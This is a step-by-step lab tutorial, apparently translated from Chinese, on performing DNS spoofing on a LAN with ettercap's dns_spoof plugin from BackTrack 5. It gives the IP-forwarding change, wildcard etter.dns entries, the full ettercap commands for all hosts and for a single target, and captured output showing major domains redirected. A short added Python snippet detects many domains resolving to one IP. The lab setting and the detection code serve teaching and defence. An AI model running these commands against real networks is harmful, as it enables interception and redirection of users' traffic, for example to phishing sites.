A DNS Spoofing Example Using ettercap

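Lab environment: BackTrack 5 R3

BackTrack 5 IP address: 192.168.1.20

The LAN contains two computers, 192.168.1.102 and 192.168.1.106, both XP machines.

Install ettercap before starting the experiment; the software can be found by searching Baidu or 51cto.

After installation, carry out the following steps.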

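1. Edit the file with vim /etc/sysctl.conf and find

#net.ipv4.ip_forward=0 and change it to net.ipv4.ip_forward=1

Then run sysctl -p, which enables IP forwarding.

2. Edit the file with vim /usr/local/share/ettercap/etter.dns

Append entries in the following format to the end of the file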

*.com  A 74.125.128.106

*.org  A 74.125.128.106

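*.com is the suffix of the sites to be spoofed, that is, every site ending in .com. For example, when a spoofed user enters www.baidu.com, they are redirected to the site at IP address 74.125.128.106. The A in the middle denotes an A record. You can add more suffixes as needed, such as cn, cc or net, or use the form *.baidu.com.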

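Then run ettercap -T -q -i eth0 -P dns_spoof // //

-T is text mode

-q runs in quiet mode

-i is the interface name

-P is the plugin to load (the dns_spoof plugin is used here)

// // spoofs everyone, not including yourself

Once this command is executed, the spoofing begins, as shown below: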

root@bt:~# ettercap -T -q -i eth0 -P dns_spoof // //

 

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:4B:5C:BE      192.168.1.20     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Privileges dropped to UID 65534 GID 65534...

 

  28 plugins

  40 protocol dissectors

  55 ports monitored

7587 mac vendor fingerprint

1766 tcp OS fingerprint

2183 known services

 

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

 

4 hosts added to the hosts list... // 4 hosts are added here

Starting Unified sniffing...

 

 

Text only Interface activated...

Hit 'h' for inline help

 

Activating dns_spoof plugin...

 

dns_spoof: [www.killdos.com] spoofed to [74.125.128.106]

dns_spoof: [www.microsoft.com] spoofed to [74.125.128.106]

dns_spoof: [www.google.com] spoofed to [74.125.128.106]

dns_spoof: [www.ab.com] spoofed to [74.125.128.106]

dns_spoof: [www.google.com] spoofed to [74.125.128.106]

dns_spoof: [www.google.com.hk] spoofed to [74.125.128.106]

dns_spoof: [ssl.gstatic.com] spoofed to [74.125.128.106]

dns_spoof: [accounts.google.com] spoofed to [74.125.128.106]

dns_spoof: [ditu.google.cn] spoofed to [74.125.128.106]

dns_spoof: [drive.google.com] spoofed to [74.125.128.106]

dns_spoof: [mail.google.com] spoofed to [74.125.128.106]

dns_spoof: [news.google.com.hk] spoofed to [74.125.128.106]

dns_spoof: [picasaweb.google.com.hk] spoofed to [74.125.128.106]

dns_spoof: [play.google.com] spoofed to [74.125.128.106]

dns_spoof: [plus.google.com] spoofed to [74.125.128.106]

dns_spoof: [translate.google.cn] spoofed to [74.125.128.106]

dns_spoof: [video.google.com.hk] spoofed to [74.125.128.106]

dns_spoof: [www.blogger.com] spoofed to [74.125.128.106]

dns_spoof: [www.googlesciencefair.com] spoofed to [74.125.128.106]

dns_spoof: [www.youtube.com] spoofed to [74.125.128.106]

 

The 74.125.128.106 I use here is a Google site, so any address I enter is redirected to Google's address.
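The output above shows the trace a wildcard etter.dns entry leaves on the network: many unrelated domains all resolving to one address. The following is an added detection example, not part of the original article; the "qname A ip" log format, the threshold of 4 and the function names are assumptions, and shared hosting or CDN addresses can also trigger it, so treat a hit as a lead to investigate.

```python
from collections import defaultdict

# Constructed sample of DNS answers observed on a client network.
# The "qname A ip" line format is an assumption for this example;
# 192.0.2.10 is a documentation-range placeholder address.
SAMPLE = """\
www.microsoft.com A 74.125.128.106
www.google.com A 74.125.128.106
mail.google.com A 74.125.128.106
www.ab.com A 74.125.128.106
www.blogger.com A 74.125.128.106
www.youtube.com A 74.125.128.106
www.example.net A 192.0.2.10
"""


def base_domain(qname):
    """Naive registered domain: the last two labels (ignores suffixes like com.hk)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def find_shared_answer_ips(lines, threshold=4):
    """Return {ip: sorted base domains} for IPs answering >= threshold unrelated domains."""
    domains_by_ip = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) != 3 or parts[1] != "A":
            continue  # skip blank lines and non-A records
        qname, _, ip = parts
        domains_by_ip[ip].add(base_domain(qname))
    return {
        ip: sorted(domains)
        for ip, domains in domains_by_ip.items()
        if len(domains) >= threshold
    }


if __name__ == "__main__":
    for ip, domains in find_shared_answer_ips(SAMPLE.splitlines()).items():
        print(f"ALERT {ip} answers for {len(domains)} unrelated domains: {domains}")
```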

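Next, run the experiment against a single computer. Stop ettercap and use ipconfig /flushdns to return the computers to normal.

Then enter the following: ettercap -T -q -i eth0 -P dns_spoof /IP to spoof/ //

For example: ettercap -T -q -i eth0 -P dns_spoof /192.168.1.105/ //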
